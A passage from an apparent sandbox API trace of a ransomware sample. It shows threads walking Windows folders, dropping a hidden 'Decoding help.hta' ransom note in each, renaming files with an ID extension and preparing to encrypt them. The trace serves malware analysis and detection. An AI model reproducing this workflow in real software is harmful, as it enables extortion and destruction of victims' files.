dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 0 [0060.113] FindClose (in: hFindFile=0x5da4b8 | out: hFindFile=0x5da4b8) returned 1 Thread: id = 936 os_tid = 0x210 [0059.978] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*.*", lpFindFileData=0x6fafd30 | out: lpFindFileData=0x6fafd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da7f8 [0059.987] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.987] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x6fafd30 | out: lpFindFileData=0x6fafd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.987] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.987] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.987] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x6fafd30 | out: lpFindFileData=0x6fafd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x24a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0059.987] lstrcpyW (in: lpString1=0x10960808, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*.*") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*.*" [0059.987] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*.*") returned 42 [0059.987] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Decoding help.hta" [0059.987] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Decoding help.hta" (normalized: "c:\\users\\public\\music\\sample music\\decoding help.hta")) returned 0xffffffff [0059.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Decoding help.hta" (normalized: "c:\\users\\public\\music\\sample music\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b0 [0061.423] WriteFile (in: hFile=0x6b0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x6fafcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x6fafcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.424] CloseHandle (hObject=0x6b0) returned 1 [0061.424] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.424] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0061.424] lstrlenW (lpString="desktop.ini") returned 11 [0061.424] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*.*") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*.*" [0061.424] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*.*") returned 42 [0061.424] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" [0061.424] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" [0061.424] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0061.425] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0062.510] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe80 [0062.510] CreateFileMappingA (hFile=0xe80, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xe84 [0062.510] CryptAcquireContextA (phProv=0x6fafcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 937 os_tid = 0x514 [0059.986] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*.*", lpFindFileData=0x8a0fd30 | out: lpFindFileData=0x8a0fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 938 os_tid = 0x7e4 [0059.994] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\*.*", lpFindFileData=0xb28fd30 | out: lpFindFileData=0xb28fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa11287e6, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa73ba87, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa119af33, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10a4b228 [0060.809] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.809] FindNextFileW (in: hFindFile=0x10a4b228, lpFindFileData=0xb28fd30 | out: lpFindFileData=0xb28fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa11287e6, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa73ba87, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa119af33, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.809] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.809] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.809] FindNextFileW (in: hFindFile=0x10a4b228, lpFindFileData=0xb28fd30 | out: lpFindFileData=0xb28fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f316407, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f316407, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0060.888] lstrcpyW (in: lpString1=0x2a7302b8, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\*.*" [0060.888] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\*.*") returned 56 [0060.889] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Decoding help.hta" [0060.889] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\decoding help.hta")) returned 0xffffffff [0060.889] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe54 [0061.633] WriteFile (in: hFile=0xe54, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xb28fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xb28fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.634] CloseHandle (hObject=0xe54) returned 1 [0061.634] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 939 os_tid = 0x318 [0060.000] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\*.*", lpFindFileData=0xd68fd30 | out: lpFindFileData=0xd68fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da678 [0060.001] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.001] FindNextFileW (in: hFindFile=0x5da678, lpFindFileData=0xd68fd30 | out: lpFindFileData=0xd68fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.001] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.001] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.001] FindNextFileW (in: hFindFile=0x5da678, lpFindFileData=0xd68fd30 | out: lpFindFileData=0xd68fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xec7c9cd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec7c9cd0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0060.001] lstrcmpW (lpString1=".", lpString2="10.0") returned -1 [0060.001] lstrcmpW (lpString1="..", lpString2="10.0") returned -1 [0060.001] lstrcmpiW (lpString1="windows", lpString2="10.0") returned 1 [0060.001] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\*.*" [0060.001] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\*.*") returned 67 [0060.001] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpString2="10.0" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0" [0060.001] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*.*" [0060.001] GlobalMemoryStatus (in: lpBuffer=0xd68fd10 | out: lpBuffer=0xd68fd10) [0060.002] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x989a7f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8d4 [0060.025] CloseHandle (hObject=0x8d4) returned 1 [0060.025] FindNextFileW (in: hFindFile=0x5da678, lpFindFileData=0xd68fd30 | out: lpFindFileData=0xd68fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xec7c9cd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec7c9cd0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 0 [0060.025] FindClose (in: hFindFile=0x5da678 | out: hFindFile=0x5da678) returned 1 Thread: id = 940 os_tid = 0x15c [0060.024] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*.*", lpFindFileData=0x8dafd30 | out: lpFindFileData=0x8dafd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2ef0 [0060.025] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.025] FindNextFileW (in: hFindFile=0x5e2ef0, lpFindFileData=0x8dafd30 | out: lpFindFileData=0x8dafd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.025] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.025] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.025] FindNextFileW (in: hFindFile=0x5e2ef0, lpFindFileData=0x8dafd30 | out: lpFindFileData=0x8dafd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe526d67f, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe54f4dac, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe54f4dac, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0060.025] lstrcpyW (in: lpString1=0x9af9288, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*.*" [0060.025] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*.*") returned 64 [0060.025] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\Decoding help.hta" [0060.025] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\decoding help.hta")) returned 0xffffffff [0060.025] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x72c [0061.429] WriteFile (in: hFile=0x72c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x8dafcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x8dafcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.430] CloseHandle (hObject=0x72c) returned 1 [0061.430] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.430] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0061.430] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0061.430] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*.*" [0061.430] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*.*") returned 64 [0061.430] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui" [0061.430] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui" [0061.430] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0061.430] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0062.514] FindNextFileW (in: hFindFile=0x5e2ef0, lpFindFileData=0x8dafd30 | out: lpFindFileData=0x8dafd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe526d67f, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe54f4dac, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe54f4dac, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0062.514] FindClose (in: hFindFile=0x5e2ef0 | out: hFindFile=0x5e2ef0) returned 1 Thread: id = 941 os_tid = 0xaa8 [0060.031] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*.*", lpFindFileData=0xd9cfd30 | out: lpFindFileData=0xd9cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da678 [0060.031] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.031] FindNextFileW (in: hFindFile=0x5da678, lpFindFileData=0xd9cfd30 | out: lpFindFileData=0xd9cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.031] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.031] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.031] FindNextFileW (in: hFindFile=0x5da678, lpFindFileData=0xd9cfd30 | out: lpFindFileData=0xd9cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe92d84cc, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe94ed7e2, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe94ed7e2, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0060.032] lstrcpyW (in: lpString1=0x9b01290, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*.*" [0060.032] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*.*") returned 64 [0060.032] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\Decoding help.hta" [0060.032] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\decoding help.hta")) returned 0xffffffff [0060.032] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x72c [0061.431] WriteFile (in: hFile=0x72c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xd9cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xd9cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.432] CloseHandle (hObject=0x72c) returned 1 [0061.432] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.432] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0061.432] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0061.432] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*.*" [0061.432] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*.*") returned 64 [0061.432] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\", lpString2="tipresx.dll.mui" | out: 